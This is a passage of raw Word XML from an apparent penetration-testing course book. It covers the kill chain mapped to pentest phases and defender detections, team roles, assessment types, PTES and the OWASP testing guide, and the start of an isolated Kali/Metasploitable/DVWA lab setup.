            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E6F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1135"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCEBF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1135"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E6F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Actions on Objectives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pP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2210"/>
        <w:gridCol w:w="2612"/>
        <w:gridCol w:w="4924"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Kill Chain Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2612"/>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Matching Pentest Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4924"/>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How Defenders Detect / Interrupt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="492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Monitor OSINT exposure; limit public data leakage; alert on scanning patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Weaponization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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Scanning &amp; Enumeration (prep)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="492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Threat intelligence on exploit kits; patch known CVEs before they are weaponised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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Gaining Access (initial vector)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="492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Email filtering, web application firewalls, endpoint controls on removable media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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Gaining Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="492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Intrusion detection/prevention systems, endpoint detection and response (EDR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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Maintaining Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="492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Antivirus/EDR, application allow-listing, integrity monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Command &amp; Control (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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Maintaining Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="492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Network egress filtering, DNS monitoring, anomaly detection on outbound traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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Actions on Objectives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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Covering Tracks (post-objective)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="492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Data loss prevention (DLP), log integrity monitoring, honeypots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.9 Red Team, Blue Team and Purple Team</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1559"/>
        <w:gridCol w:w="1949"/>
        <w:gridCol w:w="6238"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1559"/>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Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6238"/>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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1559"/>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Red Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Offensive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6238"/>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Simulates a real adversary with stealthy, objective-driven attacks to test detection and response — often without the defenders' prior knowledge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1559"/>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Blue Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Defensive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6238"/>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Monitors, detects and responds to intrusions; owns the SOC, incident response and system hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1559"/>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Purple Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Collaborative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6238"/>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 bridge between red and blue — attack techniques are shared in real time so detection gaps are closed immediately rather than only reported afterward</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.10 VAPT vs Penetration Test vs Vulnerability Assessment</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1809"/>
        <w:gridCol w:w="2512"/>
        <w:gridCol w:w="2713"/>
        <w:gridCol w:w="2712"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1809"/>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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2512"/>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Vulnerability Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2713"/>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Penetration Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2712"/>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VAPT (Combined)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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Identify and list weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2713"/>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Exploit weaknesses to prove real impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Both — identify and exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1809"/>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Depth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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Automated scanning, broad coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2713"/>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Manual, targeted, deep testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Breadth plus depth</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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None attempted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2713"/>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Active exploitation of findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Exploitation of the most important findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1809"/>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Output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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List of CVEs / risk scores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2713"/>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Proof-of-concept plus business impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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 comprehensive risk and exploit report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Typical duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="251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Hours to a day</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2713"/>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1–4 weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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2–4 weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:left w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:bottom w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:right w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F3ECF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A3D9A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">↔ Scanner found CVSS 9.8 — is it automatically top priority?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">No. A high CVSS score reflects theoretical severity, not confirmed exploitability on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">this</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> target. A Nessus finding of 9.8 may be unreachable (blocked by a firewall), already mitigated by a compensating control, or a false positive. Priority should combine CVSS, confirmed exploitability, exposure (internet-facing vs internal), and business impact of the affected asset.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.11 Introduction to PTES and the OWASP Testing Guide v4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PTES — Penetration Testing Execution Standard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PTES defines what a professional penetration test should include, end to end, across seven stages: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Pre-engagement interactions, 2. Intelligence gathering, 3. Threat modelling, 4. Vulnerability analysis, 5. Exploitation, 6. Post-exploitation, 7. Reporting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide v4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The OWASP Web Security Testing Guide (WSTG) is the industry-standard reference for testing web applications in a structured way. It is organised into categories: information gathering, configuration and deployment management, identity management, authentication testing, authorisation testing, session management, input validation testing, error handling and cryptography, business logic testing, and client-side testing. Units II and IV draw heavily on this structure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.12 Virtual Lab Setup Overview</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:left w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:bottom w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:right w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FBEAEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A33A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⛔ Lab Safety — Authorised Lab Only</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Every hands-on technique in this book must be practised only inside an isolated lab you own or are explicitly authorised to test — never against a public system, a real account, or any system without written permission. The lab below (Kali Linux + Metasploitable 2 + DVWA, isolated network) is the standard safe environment for this entire course.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A hypervisor (VirtualBox or VMware Workstation) is installed, with virtualization enabled in the BIOS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is imported as the attacker machine and boots successfully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are imported as intentionally vulnerable targets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
